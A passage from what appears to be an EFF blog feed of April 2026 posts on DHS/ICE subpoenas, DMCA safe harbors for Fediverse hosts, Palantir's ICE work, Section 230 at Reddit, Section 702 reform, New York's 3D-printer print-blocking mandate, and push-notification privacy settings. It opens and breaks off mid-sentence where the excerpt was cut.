lawful.EFF and the ACLU of Northern California in February ​wrote to Amazon, Apple, Discord, Google, Meta, Microsoft, Reddit, SNAP, TikTok, and X​ to ask that they insist on court intervention and an order before complying with a DHS subpoena; give users as much notice as possible when they are the target of a subpoena, so the users can seek help; and resist gag orders that would prevent the companies from notifying users who are targets of subpoenas.And EFF last week ​asked California’s and New York’s attorneys general to investigate Google​ for deceptive trade practices for breaking ​its promise​ to notify users before handing their data to law enforcement, citing the case of a doctoral student who was targeted with an ICE subpoena after briefly attending a pro-Palestine protest.EFF in early March filed public-records requests with DHS and ICE for their policies, procedures, guidelines, directives, memos, and legal analyses supporting such use of administrative subpoenas. EFF also requested all Inspector General or oversight records, all approval and issuance procedures for the subpoenas, all records reflecting how many such subpoenas have been issued, all communications with technology companies concerning these demands, all communications regarding specific named targets or programs, and all communications with the Department of Justice regarding such subpoenas.DHS and ICE have not responded, even though EFF requested expedited processing of its requests, which requires agencies to get back to requesters within 10 days.“The policies, directives, and authorization records governing the program have not been disclosed,” the complaint notes. “The legal basis asserted by DHS and ICE for using a customs statute to compel disclosure of information about persons engaged in constitutionally protected speech and association has not been made public.” For the complaint: https://www.eff.org/document/eff-v-dhs-ice-administrative-subpoenas-complaintFor EFF’s letter urging tech companies to protect users: ​https://www.eff.org/deeplinks/2026/02/open-letter-tech-companies-protect-your-users-lawless-dhs-subpoenas​For EFF’s letter urging state probes of Google: ​https://www.eff.org/press/releases/eff-state-ags-investigate-googles-broken-promise-users-targeted-government​ Tags: free speechprivacyanonymityDHSICEContact:  AaronMackey Deputy Legal Director/Free Speech and Transparency Litigation Directoramackey@eff.org

  • Copyright and DMCA Best Practices for Fediverse Operators
    by Mitch Stoltz on April 21, 2026 at 6:28 pm

    People building the future of the social web — interoperable and decentralized — need to protect themselves against copyright liability. Like anyone who creates and operates platforms for user-uploaded content, the hosts of the decentralized social web can take preventive measures to reduce their legal exposure when a user posts material that violates someone’s copyright. This post gives an overview of the steps to take. It’s meant for operators of Mastodon and other ActivityPub servers, Bluesky hosts, RSS mirrors, and other decentralized social media protocols, and developers of apps for those protocols — but it will apply to other hosts as well. This isn’t legal advice, and can’t substitute for a consultation with a lawyer about your specific circumstances. It focuses on U.S. law — the law may impose different requirements elsewhere. Still, we hope it helps you get started with confidence. Why should I care? Copyright’s Sword of Damocles In some circumstances, the operator of a platform that handles user content can be legally responsible for content that infringes copyright. That can happen when the platform operator is directly involved in copying or distributing the copyrighted material, when they promote or knowingly assist the infringement, or when they benefit financially from infringement while being in a position to supervise it. But these judge-made rules are often difficult and uncertain to apply in practice — and the penalties for being found on the wrong side of the law can be severe. Copyright’s “statutory damages” regime allows for massive, unpredictable financial liability. That’s why it’s important to limit your risk. For Server Operators: Limiting Risk with the DMCA Safe Harbors If you run a social network server, the safe harbor provisions of the Digital Millennium Copyright Act (DMCA) are an important way to limit your liability risk. The DMCA shields server operators from nearly all forms of copyright liability that can result from “storage at the direction of a user” — in other words, hosting user-uploaded content. But to qualify for this protection, there are steps a server operator has to take. 1. Designate A Contact To Receive Copyright Infringement Notices First, you’ll need to provide contact information for someone who can receive infringement notices (a “designated agent”). That information needs to be posted in at least two places: on your server in a place visible to users (such as a “DMCA” page or post, or as part of your Terms of Service), and in the U.S. Copyright Office’s “Designated Agent Directory.” To post that information to the directory, you have to create an account at https://www.copyright.gov/dmca-directory/ and pay a small fee. The directory listings expire after three years, and once expired, your safe harbor protection goes away, so it’s important to keep that listing current. 2. Respond Promptly to Notices and Counter-notices When you receive infringement notices, it’s important to respond to them promptly. Notices are supposed to identify the copyright holder, the copyrighted work they claim was infringed, and the post they claim is infringing. By deleting or disabling access to the posted material, you protect yourself from liability with respect to that material. The theory behind Section 512 is that hosts don’t have to be in a position of deciding whether a post infringes someone’s copyright — it’s up to the poster, the rights holder, and potentially a court to decide that. A host who takes down posts whenever they receive an infringement notice is well-protected. But it’s equally important to recognize that hosts aren’t required to take down content in response to every notice. Infringement notices are frequently wrong, misguided, or abusive, or simply incomplete. Hosts who want to stand up for their users’ speech can choose to disregard infringement notices that seem suspect. While this risks losing the automatic protection of the safe harbor in each instance, it can still be done safely with careful preparation, ideally using a plan crafted with help from a lawyer. Bear in mind that people sending false notices, including by failing to consider whether a post is a fair use before asking a host to take it down, can be liable for damages under the DMCA. The DMCA also allows the person who posted the material to send a “counter-notification” asserting that they really did have the right to post and that there’s no copyright infringement. Responding to counter-notifications is a good way for a host to demonstrate that they look out for their users. When a host receives a counter-notification, they should forward it on to the person who sent the original takedown notice and let them know that the post will be restored in 10 business days. Then, after that waiting period has elapsed, the host can restore the posted material. Just like with infringement notices, a host isn’t required to honor a counter-notification that appears to be fraudulent, but there’s no penalty for honoring it anyway. 3. Have A Repeat Infringer Policy The next requirement is to have a policy of terminating the accounts of “subscribers and account holders” who are “repeat infringers” in “appropriate circumstances,” and to carry out that policy. Yes, that’s a vague requirement. It doesn’t require a “three strikes” policy or any other sports analogy. It just needs to be reasonable. Be sure your policy is spelled out in your website terms or “DMCA” page. 4. Don’t Ignore Known Infringement Hosts need to take down user posts whenever the host actually knows that the post is infringing. In other words, a host isn’t protected if they ignore takedown notices based on technicalities in the notices, or if they learn about the infringement some other way. But hosts don’t need to actively look for infringement on their servers — only to act when someone notifies them. 5. Don’t Encourage Infringement Finally, make sure that nothing you post or advertise actively encourages copyright infringement. For example, don’t post examples of users uploading copyrighted music or video without permission, or insinuate that your server is a good place for infringing content. There are some other technicalities in the DMCA that can affect the safe harbor, which is why it’s always a good idea to consult with a lawyer. But following these steps will help protect you when you run a social media server — or any other kind of user-uploaded content platform.

  • Palantir Has a Human Rights Policy. Its ICE Work Tells a Different Story
    by Cindy Cohn on April 21, 2026 at 12:06 am

    For years, EFF has pushed technology companies to make real human rights commitments—and to live up to them. In response to growing evidence that Palantir’s tools help power abusive immigration enforcement by ICE, we sent the company a detailed letter asking how the promises in its own human rights framework extends to that work. This post explains what we asked, how Palantir responded, and why we believe those responses fall short. EFF is not alone in raising alarms about Palantir; immigrants' rights groups, human rights organizations, journalists, and former employees have raised similar concerns based on reports of the company's role in abusive immigration enforcement. We focus here on Palantir’s own human rights promises. At the outset, we appreciate that Palantir was willing to engage respectfully, and we recognize that confidentiality and security obligations can limit what it can say. Nonetheless, measured against Palantir's own human rights commitments, its decision to keep powering ICE with tools used in dragnet raids and discriminatory detentions is indefensible. A good-faith application of those commitments should lead Palantir to end its contract with ICE, and refuse new, or end current, contracts with any other agency whose work predictably violates those commitments. Palantir’s Public Promises Palantir has long said it performs comprehensive human rights analysis on its work. It has also worked with ICE for years, apparently in a more limited capacity than today. It has publicly embraced the UN Guiding Principles on Business and Human Rights, the Universal Declaration of Human Rights, and the OECD Guidelines for Multinational Enterprises. Additionally, in its response to EFF, Palantir says its legal responsibilities are only “the floor” for broader risk assessments. That was the point of our letter. We asked what human rights due diligence Palantir conducted when it first contracted with ICE and DHS; whether it performed the “proactive risk scoping” it advertises, how it reviews work over time, what it has done in response to reports of misuse, and whether it has used “every means at [its] disposal”—including contract provisions, third‑party oversight, and termination—to prevent or mitigate harms. For the most part, Palantir did not answer our accountability questions. It did correct one point: Palantir says it does not currently work with CBP, and available evidence supports that, though it also made clear it could work with CBP in the future. Palantir also raised a red herring it often deploys in response to criticism. It denied building a 'mega' or 'master' database for ICE and denied creating a database of protesters, which some ICE agents have claimed to have been built. We call it a red herring because those denials sidestep the central issues: what capabilities Palantir's tools actually provide to ICE. To be clear, EFF has never claimed that Palantir is building a single centralized database. Our concern is grounded in how Palantir’s tools allow ICE to query and analyze data from multiple databases through a unified interface—which from an agent’s perspective can be a distinction without a difference. In the sections that follow, we compare Palantir’s account of its work for ICE with evidence about how its tools seem to be used, and explain why legality, internal process, and sustained “engagement with the institutions whose vital tasks exist in tension with certain human rights” are no substitute for real human rights due diligence—because respect for human rights must be measured by outcomes, not just process. Palantir’s ICE Work Undermines Its Own Standards Palantir says ICE uses its ELITE tool for “prioritized enforcement”: to surface likely addresses of specific people, such as individuals with final orders of removal or high‑severity criminal charges. But according to sworn testimony in Oregon, ICE agents use ELITE to determine where to conduct deportation sweeps, and the system “pulled from all kinds of sources” to identify locations for raids aimed at mass detentions, including information from the Department of Health and Human Services such as Medicaid data. A leaked ELITE user guide for 'Special Operations' also instructs operators to disable filters to "display all targets within a Special Operations dataset." Those details directly conflict with Palantir’s narrow description of ELITE’s role. Additionally, Palantir's response leans on legal authority and the Privacy Act. But it does not identify any specific lawful basis for using Medicaid data in this way or explain how its software enables that access. Even if a legal theory exists, turning sensitive medical information into fuel for dragnet sweeps is hard to reconcile with its commitments to privacy, equity, and the rights of impacted communities. Its own human rights framework requires grappling with foreseeable harms its products may enable, not just invoking possible legal authorization.    Reporting shows that many people detained by ICE had no criminal record, much less a serious one, and in many cases no final order of removal. An overwhelming percentage of those detained were, or appeared to be, from Central and South America, and nearly one in five ICE arrests were street arrests of a Latine person with neither a criminal history nor a removal order. These facts raise obvious questions about discriminatory impact, racial profiling, and whether Palantir's tools are facilitating detention practices far broader than the company claims. Palantir's response does not meaningfully engage those questions, despite the company's commitments to non-discrimination and due process. EFF’s letter asked Palantir to explain how it is honoring its commitments to civil liberties in light of reports linking Palantir-owned systems to facial recognition and other tools used to identify and target people engaged in observing and recording law enforcement, including in connection with the deaths of Renée Good and Alex Pretti. The letter also cites an incident in which an officer scanned protesters’ and observers’ faces and threatened to add their biometrics to a “nice little database.” Palantir’s response denies involvement in any such database. A narrow denial about a single database does not answer the broader question: if ICE, its customer, claims it has this capability, what has Palantir done to ensure its tools are not used to chill protected speech, retaliate against observers, or facilitate targeting of people engaged in First Amendment‑protected activity? For a company that claims to value democracy and civil liberties, this is not a marginal issue; it goes to the heart of its human rights commitments. Legality, Process, and Engagement with ICE Are Not Human Rights Standards As mentioned above, Palantir leans heavily on legal compliance. It says government data sharing is “subject to, and governed by, data sharing agreements and government oversight” and that any sharing it facilitates is done according to “legal and technical requirements, including those of the Privacy Act of 1974.” It describes its role in ELITE as “data integration,” enabling ICE “to incorporate data sources to which it has access,” including data shared under inter‑agency agreements. EFF is very familiar with the Privacy Act—we are suing the Office of Personnel Management over it currently. But Palantir’s response does not clarify how ICE legally has access to this information, how Palantir ensures that it follows those legal processes, or how Palantir’s software may have enabled access in the first place. More critically, that is still a legal answer to a human rights question, and legal compliance alone is insufficient as a human rights standard. Human rights due diligence requires assessing foreseeable harms, responding to credible evidence of abuse, and changing course when the facts demand it—something Palantir, on paper, recognizes. That’s why it stresses that its legal responsibilities are only “the floor for [its] broader risk assessments,” pointing to the way it built toward GDPR‑style data protection principles and incorporated international humanitarian law principles before those requirements were formalized. If those commitments mean anything, Palantir has to explain how specific practices—like enabling ICE to use Medicaid data in dragnet raids—square with that broader standard. Palantir also leans heavily on process. It points to a “layered approach” to risk, frameworks that purportedly examine multiple dimensions of privacy and equity, and “indelible” audit logs that track how its tools are used. Audit logs are not sufficient for protecting human rights. There is a long history of authoritarian regimes keeping extensive logs of their human rights abuses. Those structures can be useful for protecting human rights, but only if they are used to detect harm, trigger reassessment, and lead to changes in design, access, support, or contract enforcement when credible reports of abuse emerge. That is why we pressed Palantir to spell out clearly what reports of misuse Palantir has received, what changes it made, and on what timeline. Again, instead of offering specific examples, Palantir points back to its internal framework and its willingness to “move towards the hardest problems” as evidence of effective efforts. But human rights are an outcome, not just a process. Human rights due diligence is not a one-time approval at contract signing; under the UN Guiding Principles, it is supposed to be continuous, with new facts triggering reassessment. Complaints, media reports, leaks, litigation, and sworn testimony are exactly the kinds of events that should prompt review. If Palantir has an account for that work— how often it reviews ICE contracts, who conducts the reviews, what triggers them, and how findings reach the Board— it had every opportunity to describe it. Instead, it offered a generic assurance that it remains committed to human rights without engaging in the specifics. Confidentiality may sometimes limit disclosure, but it is no substitute for accountability. What Needs to Happen Next  Palantir wants credit for “mov[ing] towards the hardest problems” and engaging with institutions whose missions it says are “in tension with certain human rights” while having a human rights framework. But when the record includes violent raids, dragnet detentions, use of sensitive medical data, discriminatory targeting, retaliation against observers, and deaths tied to immigration enforcement operations, pointing to a values page is not enough; it has to reckon with the results. Voluntary corporate human rights policies often function as weak accountability mechanisms: companies can tout principles, publish policies, and answer criticism with polished statements while changing very little on the ground. Palantir’s response fits that pattern all too well. EFF will continue to challenge its role in abusive immigration enforcement and demanding more accountability for technology vendors whose tools enable human rights violations. We are also happy to continue a dialogue with Palantir to that end. For now, this much is clear: Palantir needs to reconsider its contract with ICE and with all agencies whose work predictably violate human rights.

  • The Internet Still Works: Reddit Empowers Community Moderation
    by Joe Mullin on April 20, 2026 at 9:35 pm

    Section 230 helps make it possible for online communities to host user speech: from restaurant reviews, to fan fiction, to collaborative encyclopedias. But recent debates about the law often overlook how it works in practice. To mark its 30th anniversary, EFF is interviewing leaders of online platforms about how they handle complaints, moderate content, and protect their users’ ability to speak and share information.  Reddit is one of the largest user-generated content platforms on the internet, built around thousands of independent communities known as subreddits. Some subreddits cover everyday interests, while others host discussions about specialized or controversial topics. These communities are created and moderated by volunteers, and the site’s decentralized model means that Reddit hosts a vast range of user speech without relying on centralized editorial control.  Ben Lee is Chief Legal Officer at Reddit, where he oversees the company’s legal strategy and policy work on issues including content moderation and intermediary liability. Before joining Reddit, Lee held senior legal roles at other tech companies including Plaid, Twitter, and Google. At Reddit, he has been closely involved in litigation and policy debates surrounding Section 230, including cases addressing the legal risks faced by platforms and their users and moderators. He was interviewed by Joe Mullin, a policy analyst on EFF's Activism Team. Joe Mullin: When we talk about user rights and Section 230, what rights are most at stake on a platform like Reddit?  Ben Lee: Reddit, we often say, is the most human place on the internet. What’s often missing from the debate is that section 230 protects people—not platforms.  It protects millions of everyday humans and volunteer moderators who participate in online communities. Without it, people could face lawsuits for voting down a post, enforcing community rules, or moderating a discussion. These are foundational activities on Reddit, and frankly, the whole internet. If you had to describe section 230 to a regular Reddit user without naming the law, what would you say it does for them? Section 230 protects your ability to participate in community moderation. Even if all you are doing is up-voting or down-voting content, that’s participation. On Reddit, everyone is a content moderator, through voting. Up-voting determines the visibility of content.  We believe, strongly, this is one of the only models to allow Reddit to scale. You make the community part of the moderation process. They’re invested in the community, making it better.  How would user speech be affected if Section 230 were eliminated or weakened?  We would undermine community self governance—the notion that humans can do content moderation, and take that responsibility for themselves. Whether you’re a small blog or big forum. I like to think of Reddit as composed of this federation of communities that range from the tiny to the humongous. That’s what the internet is!  The legal risk would discourage people from moderating, or even speaking at all. The kind of speech we’re trying to protect is often critical of powerful people or entities. If a moderation decision leads to litigation from those powerful entities, that’s an expensive proposition to fight.  Reddit relies on user-run communities and volunteer moderators. Can you walk me through how content moderation and legal complaints actually work in practice, and where section 230 comes into that?  We have a tiered structure, like our federal system. Each community is like a state: it has its own rules, and enforces them. The vast majority of content moderation decisions are made by the communities, not by Reddit itself.  Reddit is built on self-governing communities that are moderated by volunteers, supported by automated tools. Section 230 gives Reddit the freedom to experiment, and lets users shape healthy, interest-based spaces. Section 230 is fundamental to protecting the moderators from a frivolous lawsuit. A screenwriting community might want to protect their community from scammy competitions—and then they get sued by that competition.  Or a community wants to keep their conversation civil. And, for example, may not allow Star Trek characters to be called “soy boys,” and they enforce that. Then a person sues.  I wish these were hypotheticals. But they were actual lawsuits. And we have them, routinely.  What are policymakers missing about Section 230?  The [moderation] decisions being criticized in court, are decisions to try to make the internet safer. In none of the cases that I mentioned is there a moderator saying, “I want to increase harmful content!” These are good-faith decisions about what makes the internet better.  Section 230 is, at its core, protecting the ability for people to make those choices for their own communities.  There's a price to be paid for not having a Section 230. And it will be paid by internet users—not the biggest platforms. Some see 230 as a way to punish Big Tech. But removing it doesn't punish Big Tech—it makes them more powerful. It's startups, community driven platforms, and individual moderators who rely on Section 230 to compete and innovate. Weakening Section 230 will harm the open internet, and reduce the choice, diversity, and resilience of the internet.  The big guys, they have armies of lawyers. They have the budget to withstand a flood of lawsuits. Weakening Section 230 just entrenches them.  In Reddit’s amicus brief in the Gonzalez v. Google Supreme Court case, you point out that without Section 230, many moderation decisions wouldn’t be protected. The brief states: “A plaintiff might claim emotional distress from a truthful but hurtful post that gained prominence when a moderator highlighted it as a trending topic. Or, a plaintiff might claim interference with economic relations arising from an honest but very critical two-star restaurant review.”  When you have situations where moderators get threats or litigation, what can you do?  We have had cases where our own moderators got sued, along with us. In the “soy boy” case, we worked to help find pro bono counsel for the moderators.  Someone posted “Wesley Crusher is a soy boy,” and it got removed. I'm enough of a Star Trek fan that I understand both the reference, and why the moderator decided—“hey, it's gone. I don't want this here.” This would not violate our Reddit rules. But the community took it down under its own rules about being civil. It was just not a kind-hearted action, and the community had a right to decide.  But the moderator got sued. We got sued, actually, because the poster disagreed with that moderation choice. Section 230 is what allowed us to win that case.  These are just average people, implicated only because they moderated their own community. They are trying to do the right thing by their community.  In cases where litigation happens, when does Section 230 come into play?  Section 230 is usually one of the first things that's talked about in the case. It’s usually the most effective way of saying: if you believe someone who defamed you—please go to the person who has defamed you. If you’re looking to the moderator, or to Reddit itself, this is not a great way of getting the justice that you seek.  Is there a different workflow internationally?  There’s a very different workflow. We had a prominent case in France where a company was trying to sue moderators, and of course, we didn't have section 230 to protect them. So we had to do all sorts of other things to protect them. It got much more complicated.  The breadth of content that's considered illegal in certain jurisdictions can be somewhat breathtaking.  Our goal is always to preserve as much freedom of expression as possible for our community. In the U.S., we look at it through the lens of the First Amendment, and other aspects. Outside the U.S., we rely more on the lens of international human rights.  How would you characterize legal demands around user content, the ones you see most often?  They tend to be: somebody said something mean about me—take this down. Or someone says: you didn’t allow me to say something mean about someone or some entity. It completely runs the spectrum.  One law that has already passed that weakens Section 230 is SESTA/FOSTA. From Reddit’s perspective, what changed after that?  There's some communities we had to shut down, in particular, support communities. There was a cost. Every time Section 230 is narrowed, there’s a cost—some types of speech and communities have a harder time staying online.  The cost may not seem high to some people, because those communities are not for them. But if they visited them, they’d see that these are actual people, interacting in a positive way. If it wasn’t positive, we have rules for that—but that’s a different question. 

  • Keep Pushing: We Get 10 More Days to Reform Section 702
    by Matthew Guariglia on April 17, 2026 at 7:26 pm

    In a dramatic middle-of-the-night stand off, a bipartisan set of lawmakers pushing for true reform and privacy protections for Americans bought us some more time to fight! They are holding out for, at a minimum, the requirement of an actual probable cause warrant for FBI access to information collected under the mass spying program known as 702. A reauthorization with virtually no changes was defeated because a core group of lawmakers held strong; they know that people are hungry for real reform that protects the privacy of our communications. We now have a 10-day extension to continue to push Congress to pass a real reform bill.  The Lawmakers rallied late Thursday night to reject a proposed amendment that made gestures at privacy protections, but it would not have improved on the status quo and would have reauthorized Section 702 for five more years to boot.  Take action TELL congress: 702 Needs Reform Section 702 is rife with problems, loopholes, and compliance issues that need fixing. The National Security Agency collects full conversations being conducted by and with targets overseas – including by and with Americans in the U.S. –  and stores them in massive databases. The NSA then allows other agencies, including the Federal Bureau of Investigation, to access untold amounts of that information. In turn, the FBI takes a “finders keepers” approach to this data: they reason that since it's already collected under one law, it’s OK for them to see it.  Under current practice, the FBI can query and even read the U.S. side of that communication without a warrant. What’s more, victims of this surveillance  won’t even know and have very few ways of finding out that their communications have been surveilled. EFF and other civil liberties advocates have been trying for years to know when data collected through Section 702 is used as evidence against them.   Reforming Section 702 is even more urgent because of revelations hinted at by Senator Ron Wyden’s public statements concerning a “secret interpretation” of the law that enables surveillance of Americans, and a public  “Dear Colleague” letter he sent to fellow Senators about FBI abuse of Section 702.  That’s right—the way the government conducts mass surveillance is so secret and unaccountable even the way they interpret the law is classified.   “In many cases these will be law-abiding Americans having perfectly legitimate, often sensitive, conversations,” Wyden wrote. “These Americans could include journalists, foreign aid workers, people with family members overseas - even women trying to get abortion medication from an overseas provider. Congress has an obligation to protect our country from foreign threats and protect the rights of these and other Americans.”  We have 10 days to make it clear to Congress: 702 needs real reforms. Not a blanket  reauthorization. Not lip service to change. Real reform. Take action TELL congress: 702 Needs Reform

  • Stop New York's Attack on 3D Printing
    by Rory Mir on April 16, 2026 at 8:31 pm

    New York's proposed 2026-2027 budget currently includes provisions that will require all 3D printers sold in the state to run print-blocking censorware—software that surveils every print for forbidden designs. This policy would also create felony charges for possessing or sharing certain design files. The vote on the state budget could happen as early as next week, so New Yorkers need to act fast and demand that their Assemblymembers and Senators strip this provision from the budget. Take action Tell Your Representative to Stand with Creators State legislators across the US are rushing to regulate 3D-printed firearms under the syllogism “something must be done; there, I've done something.” The most reckless of these proposals is a mandate for manufacturers to implement print blocking on all 3D printers. We, and other experts, have already pointed out that this algorithmic print blocking is simply unfeasible and will only serve to stifle competition, free expression, and privacy. While most detrimental to the creative communities lawfully using these printers, every New Yorker will be impacted by this blow to innovation. This policy is unfortunately buried in Part C of the New York State’s proposed budget for the 2026-2027 fiscal year (S.9005 / A.10005), which is urgently moving toward a vote after facing extensive delays. It’s also bundled with a policy that would allow felony charges to be brought against researchers and journalists for sharing design files restricted by the state.  The worst of these impacts won’t be known until after it is negotiated behind closed doors, with no safeguards for creative expression or privacy. Researchers and Journalists Could Face Felony Charges Part C Subpart A of the budget includes two particularly concerning provisions: §2.10 and 2.11. These threaten Class E felony charges for distributing or possessing 3D-printer files that would produce firearm parts with a 3D printer or CNC machine.  Under these provisions merely sharing a print file with any of them could result in criminal charges The first provision, 2.10, makes it a felony to sell or distribute files that can produce major firearm components to someone who is not a federally and NY-licensed gunsmith. Under 2.11, it’s also a felony to possess these files if you intend to illegally print a firearm or share them with someone you believe is not permitted to own or smith a firearm. A journalist reporting on 3D-printed guns. A researcher studying printable firearms. An artist incorporating parts into a new work commenting on gun culture. Under these provisions merely sharing a print file with any of them could result in criminal charges, even if no one involved intends to assemble a firearm. Criminalizing information doesn’t work. Someone intent on illegally printing a firearm is already subject to charges for that act. Adding felony liability for simply possessing a file or design piles on additional charges while doing nothing to stop printing. New charges for someone distributing these files won’t make them inaccessible to lawbreakers, but they will have a chilling effect on legitimate and entirely legal work.  Unsurprisingly, a similar law was proposed and subsequently scrapped in Colorado due to First Amendment concerns. We recommend New York do the same. Take action Tell Your Representative to Stand with Creators Mandated Surveillance, Less Access Part C Subpart B would require every 3D printer and CNC machine sold in New York to include algorithms that scan your design files and block prints the system identifies as producing firearm components. Furthermore, all sales and deliveries of these machines must be made face-to-face.  Unlike other bills we have seen, there are no exceptions to this mandate. These restrictions apply to sales to researchers, commercial manufacturers, and—oddly enough—federally and state-licensed gunsmiths. Applying these restrictions to CNC machine sellers is particularly absurd. These cousins of 3D printers, which make 3D objects by removing materials, are often tens of thousands of dollars and used by commercial manufacturers. Automotive, aerospace, medical manufacturers, and many others industries will be subject to the in-person sales, surveillance risk, and all the other problems with these print-blocking algorithms introduce. Industries will be subject to the in-person sales, surveillance risk, and all the other problems Even limiting the focus to individual buyers—hobbyists and artists who use these machines at home—this restriction to face-to-face sales comes with its own issues. Beyond unnecessarily complicating the use of printers in the state, this barrier to access will hit rural New Yorkers the hardest. People in rural or remote locations can stand to benefit from the saved time and costs of printing useful parts at home. With this restriction, they will need to drive to one of the few retailers who actually sell this equipment and settle for the models they stock.  That is, if sellers continue to stock these printers despite the risk. Subpart B §§ 2.3 and 2.5 open sellers up to liability, including anyone on the second-hand market, for selling out-of-date printers. Meanwhile, buyers hoping to illegally print firearms can simply build their own printer with widely available equipment. The Law Won’t Work as Advertised  Here’s what makes Subpart B of the New York budget particularly reckless: the technology it mandates is not capable of doing what it is supposed to.  There is very little detail provided about requirements for the mandated algorithms. What the bill does outline boils down to this: the algorithms must evaluate print files to determine whether they would produce a firearm or illegal firearm parts, and if so, block the print. In an attempt to enable this, New York state would also create and maintain a library of forbidden files with tightly restricted access.  We’ve already gone over why this idea simply won’t work. Design files are trivially easy to modify, split into segments, or otherwise alter to evade pattern detection. Even if printers fully rendered and analyzed the print with cloud-based AI, any number of design or post-print tricks can be used to dodge detection. Meanwhile, such fuzzy AI interpretation will rapidly increase the percentage of lawful prints censored.  Firearms aren’t a highly specific design like paper currency; these proposed algorithms are futilely attempting to block an infinite number of designs capable of—or that can be made capable of—the few simple mechanical functions that make up a firearm.  This group has no peer review requirements, so it could easily be loaded with profiteers or incumbent manufacturers As we’ve said before: the internet always routes around censorship. Anyone determined to print a prohibited object has straightforward workarounds. The people who get surveilled and blocked are the people trying to follow the law. The bill aims to enforce this impossible mandate by creating a working group to define the actual technical requirements of enforcement—but only after the law passes. This group has no peer review requirements, so it could easily be loaded with profiteers or incumbent manufacturers who are already lining up to participate. These incumbents stand to profit from shutting out new competitors and locking in users to their devices, and sellers into their platform, subjecting both to the type of enshittification seen with Digital Rights Management (DRM) software. There are also no safeguards in the law to prevent the most surveillance-heavy approaches to print scanning, or to stop this censorship infrastructure from being further weaponized against lawful speech. On the other hand, unbiased experts in open-source manufacturing in the working group can at best pause the clock by showing such algorithms are unfeasible. That is, until a new snake oil company comes along to restart it.  New York Won't Be the Last Stop  New York is one of the largest consumer markets in the country. When it mandates a feature in hardware, manufacturers hardly ever build a New York-only version. They build the New York version and sell it globally. A print-blocking mandate adopted in New York will become the national standard in practice. New Yorkers deserve more than this rush job buried in a budget bill. This is an unfeasible tech solution, built without the consumer protections that would be required of any serious policy proposal, and creates new costs and inconveniences amidst a protracted annual budget process. It also threatens First Amendment protections. This policy will take shape without consumer guardrails, behind closed doors, and risks the worst outcomes for grassroots innovation and creativity enabled by these machines. Worse still, these practices can become the norm across other states and among 3D-printer manufacturers worldwide.  Your representatives could vote on this ill-conceived measure in the next week.  If you're a New Yorker, email your legislators now, and tell them to strip this measure from the budget today.  Take action Tell Your Representative to Stand with Creators

  • How Push Notifications Can Betray Your Privacy (and What to Do About It)
    by Thorin Klosowski on April 16, 2026 at 4:41 pm

    Update April 22, 2026. Apple has reportedly addressed part of the issue with the notification database in iOS 26.4.2 and 18.7.8, released today. With this update, notifications marked for deletion should no longer be stored in the notification database. A phone’s push notifications can contain a significant amount of information about you, your communications, and what you do throughout the day. They’re important enough to government investigations that Apple and Google now both require a judge’s order to hand details about push notifications over to law enforcement, and even with that requirement Apple shares data on hundreds of users. More recently, we also learned from a 404 Media report that law enforcement forensic extraction tools can unearth the text from deleted notifications, including those from secure messaging tools, like Signal. The good news is that you can mitigate some of this risk.  There are two points where notifications may betray your privacy: when they’re transmitted over cloud servers and once they land on the device. Let’s start with the cloud. It might seem like push notifications come directly from an app, but they are typically routed through either Apple or Google’s servers first (depending on if you use iOS or Android). According to a letter sent to the Department of Justice by Senator Wyden, the content of those notifications may be visible to Apple and Google, and at the very least the companies collect some metadata about what apps send a notification and when. App providers have to make the decision to hide the content from Apple and Google and implement that functionality; Signal is one app that does this.  Then, once the notifications land on your phone, depending on your settings, the notification content may be visible on your lock screen without needing to unlock the device. This can be dangerous if you lose your device, someone steals it, or it’s confiscated by law enforcement.  You may clear notifications after looking at them. But it turns out the content notifications get recorded in your device’s internal storage, which then makes them susceptible to recovery with certain types of forensic tools. Notification content may even persist after the app is deleted, if the OS doesn’t fully purge the app’s notification data.  We still have a lot of unanswered questions about how the notification databases work on devices. We do not know how long notifications are stored, or whether they’re backed up to the cloud, in which case the cloud provider could get backdoor access to the content of messages if the backups are enabled and not end-to-end encrypted. This may also make backups vulnerable to law enforcement demands for data.  Which is all to say that there are myriad ways that law enforcement can access the content or metadata of push notifications. Let’s fix that. Consider the Strongest Notification Protections for Your Secure Messaging Apps Secure chat tools are designed to keep the content of the messages safe inside the app. So, for secure chat apps like WhatsApp and Signal, that means the company that makes those apps cannot see the content of your messages, and they’re only accessible on your and your recipients’ devices. Once messages land on a device, it’s still important to consider some privacy precautions, particularly with notifications.  SignalSignal offers three levels of information to include in notifications, all which are pretty self explanatory: Name, Content, and Actions (Name and message on Android) shows the entirety of a message as well as who sent it (on iPhone you can also slide to reply, mark as read, or call back).  Name only only shows the name of the sender.  No Name or Content (No name or message on Android) will only show that you have a message from Signal, not who sent it or what it’s about.  To change your settings: On iPhone: Tap your profile picture, then Settings > Notifications > Show. On Android: Tap your profile picture, then Notifications > Show.  WhatsAppWhatsApp only has one option for this, and it’s currently limited to iPhone, but you can at least tell the app not to include the content of a message in the notification: Open WhatsApp for iPhone, tap the “You” bar, then Notifications, and disable the Show preview option. Check your other apps to see if they offer similar settings. Limit Your Notifications Device-Wide Since Apple and Google manage push notifications for their respective devices, they also have some visibility into certain data. Push notification data can include certain types of metadata, like which app sent a notification and when, as well as the account ID associated with the phone. In some cases, Apple and Google may have access to unencrypted content, including the content of the text in a notification or other information from the app itself.  For most app notifications, there’s no simple way to easily figure out what metadata might be gleaned from a notification, or if the notification is unencrypted or not. But some app developers have described details along these lines. For example, Signal president Meredith Whittaker explained on social media how the Signal app handles notifications entirely on-device. Searching online for an app name along with “notification privacy,” “notification encryption” or “notification metadata” may help answer your questions, or you may need to dig around in support forums for the app. It’s also good to reconsider whether any app should be sending you notifications to begin with. Aside from a potential decrease in the number of distractions you endure throughout the day, or the level of chaos on display on your lockscreen, limiting the apps that can send notifications and what content is visible in them can improve your privacy with respect to the sorts of metadata that may be gathered by the companies, as well as any content that may be viewable if someone has physically accessed your device. To check and change your settings on iPhone Open Settings > Notifications. On the Show Previews option, you can choose whether to show the content of notifications on the lock screen, “Always,” which doesn’t require unlocking the device, “When Unlocked,” which does, and “Never,” which means notifications won’t have any details, just that you have a notification in an app.  Alternatively, you can scroll down and change these settings per app. Just tap the app name, then the Show Previews menu, and choose how you’d like them to appear. Or, if you’ve decided you don’t want notifications from that app at all, uncheck the Allow Notifications option. To check and change your settings on AndroidThe core version of Android relies on app developers to develop specific settings more than controlling them on a platform-wide level. Open Settings > Notifications > App notifications to disable notifications from any app completely. Some apps may also offer internal notification options for specific types of notices, like new messages, that you can control in the app itself. Tap an app name, then tap the Addition settings in the app option to potentially customize it more. You can also experiment with the sensitive content setting. This is up to the developer to set properly, but when done so, most notifications will require at least unlocking the device to see 